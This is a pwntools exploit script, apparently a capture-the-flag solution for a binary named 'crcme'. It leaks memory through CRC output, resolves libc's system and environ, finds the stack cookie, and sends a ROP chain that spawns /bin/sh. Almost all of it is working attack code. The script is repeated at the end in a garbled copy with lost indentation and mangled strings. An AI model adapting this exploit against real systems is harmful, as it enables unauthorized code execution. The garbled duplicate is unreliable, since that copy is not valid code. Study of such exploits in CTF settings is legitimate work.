kokjo/doit.py

## doit.py
from pwn import *

s = log.waitfor("Calculating CRC reverse lookup table")
reverse_crc = {crc.crc_32(p16(i)): p16(i) for i in range(2**16)}
s.success()

e = ELF("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
r = process("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")

@MemLeak
def leak(addr):
    f = 0
    if "\n" in p32(addr):
        log.info("Leaking address with newline: 0x%x", addr)
        addr -= 1
        f = 1
    #Choice:
    r.sendline("1")
    #What is the length of your data:
    r.sendline("2")
    #Please send me 1 bytes to process:
    r.sendline("/bin/sh\x00".ljust(100, "A") + p32(addr))
    r.recvuntil("CRC is: ")
    crc = int(r.recvline(), 16)
    return reverse_crc[crc][f:]

d = DynELF(leak, elf=e)

system = d.lookup("system", lib="libc.so")
log.info("system = 0x%x", system)

environ = d.lookup("environ", lib="libc.so")
log.info("environ = 0x%x", environ)

stack = leak.d(environ)
for i in range(0x400):
    if leak.d(stack-i) == 0x41414141: break
stack = stack - i
log.info("stack = 0x%x", stack)

cookie = leak.d(stack+8)
log.info("cookie = 0x%x", cookie)

binsh = stack-100+4

rop = flat(["A"*40, cookie, "B"*12, system, 0x41414141, binsh])

assert "\n" not in rop

r.sendline(rop)
r.sendline("echo SHELL")
r.recvuntil("SHELL\n")

r.interactive()
	from pwn import *

	s = log.waitfor("Calculating CRC reverse lookup table")
	reverse_crc = {crc.crc_32(p16(i)): p16(i) for i in range(2**16)}
	s.success()

	e = ELF("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")
	r = process("./crcme_8416479dcf3a74133080df4f454cd0f76ec9cc8d")

	@MemLeak
	def leak(addr):
	f = 0
	if "\n" in p32(addr):
	log.info("Leaking address with newline: 0x%x", addr)
	addr -= 1
	f = 1
	#Choice:
	r.sendline("1")
	#What is the length of your data:
	r.sendline("2")
	#Please send me 1 bytes to process:
	r.sendline("/bin/sh\x00".ljust(100, "A") + p32(addr))
	r.recvuntil("CRC is: ")
	crc = int(r.recvline(), 16)
	return reverse_crc[crc][f:]

	d = DynELF(leak, elf=e)

	system = d.lookup("system", lib="libc.so")
	log.info("system = 0x%x", system)

	environ = d.lookup("environ", lib="libc.so")
	log.info("environ = 0x%x", environ)

	stack = leak.d(environ)
	for i in range(0x400):
	if leak.d(stack-i) == 0x41414141: break
	stack = stack - i
	log.info("stack = 0x%x", stack)

	cookie = leak.d(stack+8)
	log.info("cookie = 0x%x", cookie)

	binsh = stack-100+4

	rop = flat(["A"40, cookie, "B"12, system, 0x41414141, binsh])

	assert "\n" not in rop

	r.sendline(rop)
	r.sendline("echo SHELL")
	r.recvuntil("SHELL\n")

	r.interactive()